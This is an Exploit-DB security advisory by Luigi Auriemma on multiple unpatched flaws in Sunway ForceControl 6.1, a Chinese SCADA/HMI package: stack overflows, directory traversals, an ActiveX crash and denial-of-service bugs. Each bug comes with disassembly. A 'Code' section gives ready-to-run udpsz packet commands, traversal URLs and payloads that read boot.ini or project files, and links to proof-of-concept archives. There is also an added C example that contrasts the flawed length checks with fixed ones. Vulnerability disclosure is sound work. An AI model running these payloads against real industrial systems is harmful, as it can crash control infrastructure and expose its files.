Sunway ForceControl 6.1 sp3 – Multiple Vulnerabilities

  • Author: Luigi Auriemma
  • Date: 2011-09-23
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/17885/

    #######################################################################
    
     Luigi Auriemma
    
    Application:  Sunway ForceControl
                  http://www.sunwayland.com.cn/pro.asp
    Versions:     <= 6.1 sp3 with AngelServer and WebServer updated
    Platforms:    Windows
    Bugs:         various stack overflows
                  directory traversals
                  third party ActiveX code execution
                  various Denials of Service
    Exploitation: remote
    Date:         22 Sep 2011
    Author:       Luigi Auriemma
    e-mail:       aluigi@autistici.org
    web:          aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    ForceControl is a Chinese SCADA/HMI software package.
    
    
    #######################################################################
    
    =======
    2) Bugs
    =======
    
    -----------------------------
    A] AngelServer stack overflow
    -----------------------------
    
    A signed comparison in the handler for packet 8 of AngelServer leads to
    a stack overflow:
    
    004022E1 > B9 19000000      MOV ECX,19
    004022E6 . 33C0             XOR EAX,EAX
    004022E8 . 8D7C24 24        LEA EDI,DWORD PTR SS:[ESP+24]
    004022EC . 83FE 64          CMP ESI,64                        ; our value
    004022EF . F3:AB            REP STOS DWORD PTR ES:[EDI]
    004022F1 . 0F8D E7000000    JGE AngelSer.004023DE             ; signed
    004022F7 . 8BCE             MOV ECX,ESI
    004022F9 . 8D75 0C          LEA ESI,DWORD PTR SS:[EBP+C]
    004022FC . 8BD1             MOV EDX,ECX
    004022FE . 8D7C24 24        LEA EDI,DWORD PTR SS:[ESP+24]
    00402302 . C1E9 02          SHR ECX,2                         ; memcpy
    00402305 . F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    00402307 . 8BCA             MOV ECX,EDX
    00402309 . 8D4424 24        LEA EAX,DWORD PTR SS:[ESP+24]
    0040230D . 83E1 03          AND ECX,3
    00402310 . 50               PUSH EAX
    00402311 . F3:A4            REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    00402313 . 8B8C24 A0000000  MOV ECX,DWORD PTR SS:[ESP+A0]
    0040231A . E8 A1FDFFFF      CALL AngelSer.004020C0
    0040231F . E9 BA000000      JMP AngelSer.004023DE
    
    
    --------------------------------
    B] WebServer directory traversal
    --------------------------------
    
    Through the use of a three-dot ("...") pattern it is possible to download
    the files located on the disk of the project used by WebServer.
    
    
    --------------------------------------------
    C] various Denials of Service in AngelServer
    --------------------------------------------
    
    The AngelServer program is affected by various problems that lead to
    Denial of Service effects:

    - exception handler hit due to unallocatable memory through packet 6
    - invalid memory read access during memcpy through packet 6
    - whole system reboot through packet 6
    - endless loop during the handling of the interfaces through packet 6
    - whole system reboot through packet 7
    
    
    -------------------------------------
    D] third party ActiveX code execution
    -------------------------------------
    
    This software is bundled with the YRWXls.ocx ActiveX component from
    "Cell Software" (BD9E5104-2F20-4A9F-AB14-82D558FF374E, version 5.3.7.321,
    which is the latest), and it is affected by a vulnerability in the Login
    method:
    
    eax=886641aa ebx=02c55aac ecx=015ebd5c edx=886641ab esi=886641aa edi=015ebd88
    eip=02c01db2 esp=015ebd10 ebp=02c867c0 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
    YRWXls!DllRegisterServer+0x2ab62:
    02c01db2 8a08            mov     cl,byte ptr [eax]          ds:0023:886641aa=??
    0:008> gn
    (a1c.e00): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=6ed9b6fc edx=7c8285f6 esi=00000000 edi=00000000
    eip=6ed9b6fc esp=015eb948 ebp=015eb968 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    6ed9b6fc ??              ???
    
    No additional research has been performed on the vulnerability; anyway,
    in my test it's necessary to load any other unsafe ActiveX component
    first (tested on Windows 2003).
    
    
    -------------------------------------
    E] stack overflow in SNMP NetDBServer
    -------------------------------------
    
    A stack overflow caused by copying data chunks into a stack buffer:
    
    0040303A |. 66:8B40 0A      MOV AX,WORD PTR DS:[EAX+A]           ; chunks
    0040303E |. 0FBFC0          MOVSX EAX,AX
    00403041 |. 3BC7            CMP EAX,EDI
    00403043 |. 0F8E AC000000   JLE SNMP_Net.004030F5
    00403049 |. 894424 14       MOV DWORD PTR SS:[ESP+14],EAX
    0040304D |> B9 10000000    /MOV ECX,10
    00403052 |. 33C0           |XOR EAX,EAX
    00403054 |. 8D7C24 2C      |LEA EDI,DWORD PTR SS:[ESP+2C]
    00403058 |. 83C3 02        |ADD EBX,2
    0040305B |. F3:AB          |REP STOS DWORD PTR ES:[EDI]
    0040305D |. 8B46 2C        |MOV EAX,DWORD PTR DS:[ESI+2C]
    00403060 |. 43             |INC EBX
    00403061 |. 8D7C24 2C      |LEA EDI,DWORD PTR SS:[ESP+2C]
    00403065 |. 66:8B6C18 FD   |MOV BP,WORD PTR DS:[EAX+EBX-3]      ; chunk num
    0040306A |. 8A4C18 FF      |MOV CL,BYTE PTR DS:[EAX+EBX-1]      ; chunk size
    0040306E |. 884C24 20      |MOV BYTE PTR SS:[ESP+20],CL
    00403072 |. 8D3418         |LEA ESI,DWORD PTR DS:[EAX+EBX]
    00403075 |. 8B5424 20      |MOV EDX,DWORD PTR SS:[ESP+20]
    00403079 |. 81E2 FF000000  |AND EDX,0FF
    0040307F |. 8BCA           |MOV ECX,EDX
    00403081 |. 03DA           |ADD EBX,EDX                         ; concatenate
    00403083 |. 8BC1           |MOV EAX,ECX
    00403085 |. C1E9 02        |SHR ECX,2                           ; memcpy
    00403088 |. F3:A5          |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    0040308A |. 8BC8           |MOV ECX,EAX
    0040308C |. 83E1 03        |AND ECX,3
    0040308F |. F3:A4          |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    
    
    ---------------------------------------------
    F] integer stack overflow in SNMP NetDBServer
    ---------------------------------------------
    
    A signed 8-bit value is sign-extended and then used as the length of a
    memcpy into a stack buffer. Note that in this case too the chunked data
    can be concatenated, so the overflow can also be reached that other way:
    
    00402B78 |. 0FBE2C1A        |MOVSX EBP,BYTE PTR DS:[EDX+EBX]    ; 8bit expansion
    00402B7C |. F3:AB           |REP STOS DWORD PTR ES:[EDI]
    00402B7E |. 8BCD            |MOV ECX,EBP
    00402B80 |. 43              |INC EBX
    00402B81 |. 8BC1            |MOV EAX,ECX
    00402B83 |. 8D7C24 20       |LEA EDI,DWORD PTR SS:[ESP+20]
    00402B87 |. 8D341A          |LEA ESI,DWORD PTR DS:[EDX+EBX]
    00402B8A |. 03DD            |ADD EBX,EBP                        ; concatenate
    00402B8C |. C1E9 02         |SHR ECX,2                          ; memcpy
    00402B8F |. F3:A5           |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    00402B91 |. 8BC8            |MOV ECX,EAX
    00402B93 |. 33C0            |XOR EAX,EAX
    00402B95 |. 83E1 03         |AND ECX,3
    00402B98 |. 43              |INC EBX
    00402B99 |. F3:A4           |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    ...and...
    00402B9B |. 0FBE6C1A FF     |MOVSX EBP,BYTE PTR DS:[EDX+EBX-1]
    00402BA0 |. B9 10000000     |MOV ECX,10
    00402BA5 |. 8D7C24 40       |LEA EDI,DWORD PTR SS:[ESP+40]
    00402BA9 |. F3:AB           |REP STOS DWORD PTR ES:[EDI]
    00402BAB |. 8BCD            |MOV ECX,EBP
    00402BAD |. 8D341A          |LEA ESI,DWORD PTR DS:[EDX+EBX]
    00402BB0 |. 8BD1            |MOV EDX,ECX
    00402BB2 |. 8D7C24 40       |LEA EDI,DWORD PTR SS:[ESP+40]
    00402BB6 |. C1E9 02         |SHR ECX,2
    00402BB9 |. F3:A5           |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
    00402BBB |. 8BCA            |MOV ECX,EDX
    00402BBD |. 8D4424 40       |LEA EAX,DWORD PTR SS:[ESP+40]
    00402BC1 |. 83E1 03         |AND ECX,3
    00402BC4 |. 50              |PUSH EAX
    00402BC5 |. F3:A4           |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    
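    The two length-handling mistakes behind bugs A and F, modelled in C as an added example that is not code from the advisory or from ForceControl, with each flawed check beside a fixed one; the fixed chunk parser also covers the concatenation path of bug E. The function names, the chunk layout [num:2][size:1][data:size] simplified from listing E, and the buffer sizes read off the listings (0x64 bytes for A, 16 dwords for E/F) are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ANGEL_BUF 100   /* bug A: CMP ESI,64 checks against 0x64 = 100 bytes */
#define CHUNK_BUF 64    /* bugs E/F: MOV ECX,10 ; REP STOS clears 16 dwords */

/* Bug A as compiled: the wire length is compared as a signed value, so
 * 0xffffffff (-1) satisfies "len < 100" and the copy runs with ECX = -1. */
int angel_len_ok_vuln(int32_t len) { return len < ANGEL_BUF; }   /* CMP/JGE */

/* Fixed: compare the length as unsigned, so anything >= 100 is rejected. */
int angel_len_ok_fixed(uint32_t len) { return len < ANGEL_BUF; }

/* Bug F as compiled: MOVSX turns size byte 0xff into -1, and REP MOVS then
 * treats ECX as the unsigned count 0xffffffff. */
uint32_t chunk_len_as_parsed_vuln(uint8_t size_byte) {
    int32_t ecx = (int8_t)size_byte;   /* MOVSX EBP,BYTE PTR DS:[EDX+EBX] */
    return (uint32_t)ecx;
}

/* Fixed chunk concatenation. Layout assumed from listing E:
 * [num:2][size:1][data:size] repeated. Returns bytes copied, or -1 when a
 * chunk runs past the packet or the running total would exceed outcap. */
int concat_chunks_fixed(const uint8_t *pkt, size_t pktlen,
                        uint8_t *out, size_t outcap) {
    size_t i = 0, used = 0;
    while (i + 3 <= pktlen) {
        size_t size = pkt[i + 2];            /* uint8_t: never sign-extended */
        i += 3;
        if (size > pktlen - i) return -1;    /* chunk longer than the packet */
        if (size > outcap - used) return -1; /* concatenation would overflow */
        memcpy(out + used, pkt + i, size);
        used += size; i += size;
    }
    return (int)used;
}

int main(void) {
    /* Constructed sample packet: chunk 1 = "abc", chunk 2 = "de". */
    static const uint8_t pkt[] = {0,1,3,'a','b','c', 0,2,2,'d','e'};
    uint8_t out[CHUNK_BUF];
    printf("bug A accepts -1: vuln=%d fixed=%d; bug F length for 0xff: 0x%08x\n",
           angel_len_ok_vuln(-1), angel_len_ok_fixed(0xffffffffu),
           (unsigned)chunk_len_as_parsed_vuln(0xff));
    printf("fixed concat copied %d bytes\n",
           concat_chunks_fixed(pkt, sizeof pkt, out, sizeof out));
    return 0;
}
```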
    
    ----------------------------------------
    G] Denial of Service in SNMP NetDBServer
    ----------------------------------------
    
    00402A0A |> 8B4B 30         MOV ECX,DWORD PTR DS:[EBX+30]
    00402A0D |. 83F9 0B         CMP ECX,0B
    00402A10 |. 7C 24           JL SHORT SNMP_Net.00402A36
    00402A12 |. 8B5B 2C         MOV EBX,DWORD PTR DS:[EBX+2C]
    00402A15 |. 8B43 06         MOV EAX,DWORD PTR DS:[EBX+6]
    00402A18 |. 3BC8            CMP ECX,EAX
    00402A1A |. 7C 1A           JL SHORT SNMP_Net.00402A36        ; signed comparison
    00402A1C |. 8D5403 FE       LEA EDX,DWORD PTR DS:[EBX+EAX-2]
    00402A20 |. B9 A0704000     MOV ECX,SNMP_Net.004070A
    00402A25 |. 5F              POP EDI
    00402A26 |. 5E              POP ESI
    00402A27 |. 66:8B02         MOV AX,WORD PTR DS:[EDX]          ; invalid access
    
    
    -----------------------------------
    H] Directory traversal in NetServer
    -----------------------------------
    
    Through this server it is possible to read any file on the disk where the
    project is located, via directory traversal.
    Opcodes 0x00 and 0x04 are used to open the file (the first one only
    prepends the full project path to the name), while 0x02 is used to read
    and send its content, with the possibility of also specifying the offset.

    Note that there is also a very limited heap overflow caused by the
    calculations performed on the offset, where it is possible to allocate a
    0-byte buffer for the reply packet, but with only a Denial of Service
    effect.
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip (version 0.3.3)
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip
    
    A]
    udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400
    
    B]
    http://SERVER/.../.../.../boot.ini
    
    C]
    udpsz -T -C "06000000 00000000 ffffffff" -b a SERVER 8800 0x400
    udpsz -T -C "06000000 00000000 ffffff00" -b a SERVER 8800 0x400
    udpsz -T -C "06000000 00000000 00040000" -b a SERVER 8800 0x400
    udpsz -T -C "06000000 00000000 00040000" -c "2147483647," -b a SERVER 8800 0x400
    udpsz -T -C "07000000 00000000 00000000" SERVER 8800 0x400
    
    D]
    http://aluigi.org/poc/yrwxls_1.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17885-2.zip
    
    E]
    udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff
    
    F]
    udpsz -C "eb50eb50 5700 ffff0000 0100 ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff
    
    G]
    udpsz -C "eb50eb50 0000 80808080" -T SERVER 2001 0xb
    
    H]
    udpsz -D -1 -C "8888888888888888 00010000 01000000 04000000 2e2e5c2e2e5c626f6f742e696e69" 0 -C "8888888888888888 1c000000 01000000 02000000 00000000 ffffff7f" -1 -T SERVER 2006 0x11c
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################